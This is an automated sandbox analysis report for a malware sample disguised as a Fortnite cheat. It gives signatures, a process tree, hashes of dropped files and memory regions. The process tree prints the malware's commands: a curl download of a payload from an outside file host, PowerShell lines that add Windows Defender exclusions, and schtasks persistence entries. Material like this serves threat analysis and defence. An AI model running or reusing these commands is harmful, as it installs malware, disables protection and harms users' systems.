Analysis

  • max time kernel
    20s
  • max time network
    12s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2024 01:08

General

  • Target

    fortnite-external.exe

  • Size

    392KB

  • MD5

    450270d6a68cf6364e98f16b917a84e6

  • SHA1

    3e89467c9cbc12a76ab77c50913ee45420e16ccc

  • SHA256

    30a300329684903e2ca4a937aacbfb337ab30474aadd40e473ca544e8069c52d

  • SHA512

    27c7b9c03a026ba578d6c71f6805d07a702740ce21f2e738cadb7fd2d455d6b1abf620c5b147ee018494a33376ff4e907bdf8ce0fa76f7970abe6cd03da6b4b6

  • SSDEEP

    6144:whcdTWDsDiY4ElESAtEnESbkaXOahqJiSxRODbGWrZjkmn35GYrZ8RA:fdxE7xr4kmnJ

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Process spawned unexpected child process 6 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 3 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops file in System32 directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Modifies registry class 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 6 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 49 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 19 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe
    "C:\Users\Admin\AppData\Local\Temp\fortnite-external.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:5060
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:448
      • C:\Windows\system32\curl.exe
        curl --silent https://files.catbox.moe/grb4ph.bin --output C:\Windows\Speech\physmeme.exe
        3⤵
        • Drops file in Windows directory
        PID:4252
    • C:\Windows\Speech\physmeme.exe
      "C:\Windows\Speech\physmeme.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:5012
      • C:\Windows\SysWOW64\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Edge\JVechqugVQULxoCxdNxRwhT9H4AJgXiAXoRwxtptuwyob.vbe"
        3⤵
        • Checks computer location settings
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:628
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Edge\fu4i1MBsp.bat" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4692
          • C:\Edge\msedge.exe
            "C:\Edge/msedge.exe"
            5⤵
            • Modifies WinLogon for persistence
            • Executes dropped EXE
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:4972
            • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
              "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\joalwbv0\joalwbv0.cmdline"
              6⤵
              • Drops file in System32 directory
              • Suspicious use of WriteProcessMemory
              PID:1256
              • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES14EA.tmp" "c:\Windows\System32\CSC3835A5923E764F73A740FE53FEB14B23.TMP"
                7⤵
                  PID:4820
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\fortnite-external.exe'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                PID:464
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Edge\msedge.exe'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                PID:3536
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\cj9MjoEi0N.bat"
                6⤵
                  PID:4888
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fortnite-externalf" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:3508
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fortnite-external" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4800
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "fortnite-externalf" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\AppData\Local\fortnite-external.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:4832
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 9 /tr "'C:\Edge\msedge.exe'" /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:936
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:1008
      • C:\Windows\system32\schtasks.exe
        schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 7 /tr "'C:\Edge\msedge.exe'" /rl HIGHEST /f
        1⤵
        • Process spawned unexpected child process
        • Scheduled Task/Job: Scheduled Task
        PID:2288

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Edge\JVechqugVQULxoCxdNxRwhT9H4AJgXiAXoRwxtptuwyob.vbe

        Filesize

        192B

        MD5

        e5437373d0605c93bc97b65a4a12d739

        SHA1

        671858874a65fd9c7d3de894ba4c590b537f0bde

        SHA256

        9440e1281d71c9d954fb0510d3eb29a1270d10eca8394744c5bd91e2e6f83307

        SHA512

        5345d25ba8cbd179fddbc1255e26e5d3f5e2161e99e4be3bfba1ece5ae317c22df8e115415e300ca5763bd993fb45aa0f5cfca0278c8a6eabb29d48548cf0d2f

      • C:\Edge\fu4i1MBsp.bat

        Filesize

        63B

        MD5

        f797a77c821b724238a50a77f0fe1aae

        SHA1

        ee9ff366bdfcba73d9ca0753670f2660baaec9f2

        SHA256

        00c0f57e5f833e74c22e63732816c59eb1f9b8cff197eea7373c32aac58d08d7

        SHA512

        04459b565bd18d707af3740f3f76050dc8d1f5cb4d335460fcc9c3658695558b9bf67e82beb25996c86ee7ba4a2705eaa4da55facc44fa1e854552cd49d8aa23

      • C:\Edge\msedge.exe

        Filesize

        1.8MB

        MD5

        9257cb2730e4744e1fd4565dec8eb3c8

        SHA1

        a9147f6de05447b78bd78b71517a650028498836

        SHA256

        2964966063f51dd2c3d381468a9d9091d8581442b9d63564af056274cb797061

        SHA512

        0b2228b607a3aa0302515312ab5f9cf86b78c44b94bba7a53507afba00d55208d1387585cd8c0714a9c66831bf99036d91fb81398d6806fd2e086d6019e67e6c

      • C:\Users\Admin\AppData\Local\Temp\RES14EA.tmp

        Filesize

        1KB

        MD5

        18563bba5418c09591d115618a331fa6

        SHA1

        c75857bec13834ce9a2e4a7fba900570c53c0800

        SHA256

        e2bb96027efab7ce2b53469a5e30aa30abeda5b1f3a6034ca32a7dbfb97fe37a

        SHA512

        08f95a4fa79440f780c696fb0ae4369c218229b7ec48d5ac8d8b3a8cea6eaf5cb62429c4e8efb23a58592d0ce627bb6723f562754f6c57dbb97a6199ff62c8ac

      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s53fwsuy.i3h.ps1

        Filesize

        60B

        MD5

        d17fe0a3f47be24a6453e9ef58c94641

        SHA1

        6ab83620379fc69f80c0242105ddffd7d98d5d9d

        SHA256

        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

        SHA512

        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      • C:\Windows\Speech\physmeme.exe

        Filesize

        2.1MB

        MD5

        e5f3f9c01d860a57b5dbc30b44ab4ba0

        SHA1

        4a7a9c4aba1968491fcabea3abeaa5ecf3fcb71d

        SHA256

        bd86ed3a268c8e85089ad0602b8894a6463b61569d64b92b63a4c5ab5fed5c0b

        SHA512

        e771a3370cc9706be105ccf8e732e4502845bdbd2b26d9b47ec5766497f419157e01baccd36c8e418fb25de284effcef2da6683f62ca561786c7353140e0a55f

      • \??\c:\Users\Admin\AppData\Local\Temp\joalwbv0\joalwbv0.0.cs

        Filesize

        382B

        MD5

        c8d90847100e57bb85b3d93346e92483

        SHA1

        20f9fcc90c4f2cdf33609e39b629033b2b697adb

        SHA256

        8a4b771e0f414291e7aa8d37db335ef83df01d47ad145c70b85ea38d187b5f58

        SHA512

        daf3526ee04421eb37a6ebd2e81683c6d466221fe638a10ebe9b955c3f676a36fb5f6789be4fbf95380080aebaabe602f16a637a59492474a763788e78c99e68

      • \??\c:\Users\Admin\AppData\Local\Temp\joalwbv0\joalwbv0.cmdline

        Filesize

        235B

        MD5

        0adfac9f20038e7b7da97f6f1459cf79

        SHA1

        bcfb5414606c1f4b4bd0b04170fb17c69ade780c

        SHA256

        24292975991ea9ae0273eacfb757c8c3a080d331a9fe5b083fe786cbe3bd5a4c

        SHA512

        f5f9a6811ffdbce775cb09f556a0f2f54ec2951772c33f0925508db13d54df404b7437cfcbd271aa5232864776b97e3a58e7a2ba9544dfcf6844084d0f602bb7

      • \??\c:\Windows\System32\CSC3835A5923E764F73A740FE53FEB14B23.TMP

        Filesize

        1KB

        MD5

        aaedb470feff0ca43ba622b01d0e7b4f

        SHA1

        e88615dbe9a5c74b28a0cb38666ddb91bd014dd4

        SHA256

        deb4e21657569076441e2f2ed83756a093bb6588a75d8febbabedd64d96d183f

        SHA512

        cf825cfd11de31c4faa0516b0d3b6bc54290f5c5d1098950a6f82fbdc02b8235c2dcae53df823c00def7d47bdada06970cceee01cb5db183ff83879d98977910

      • memory/3536-53-0x0000020931360000-0x0000020931382000-memory.dmp

        Filesize

        136KB

      • memory/4972-15-0x00000000000F0000-0x00000000002CA000-memory.dmp

        Filesize

        1.9MB

      • memory/4972-24-0x0000000002460000-0x000000000246C000-memory.dmp

        Filesize

        48KB

      • memory/4972-22-0x000000001AF40000-0x000000001AF58000-memory.dmp

        Filesize

        96KB

      • memory/4972-20-0x000000001B2C0000-0x000000001B310000-memory.dmp

        Filesize

        320KB

      • memory/4972-19-0x000000001AF20000-0x000000001AF3C000-memory.dmp

        Filesize

        112KB

      • memory/4972-17-0x0000000002450000-0x000000000245E000-memory.dmp

        Filesize

        56KB

      • memory/4972-55-0x000000001B510000-0x000000001B57B000-memory.dmp

        Filesize

        428KB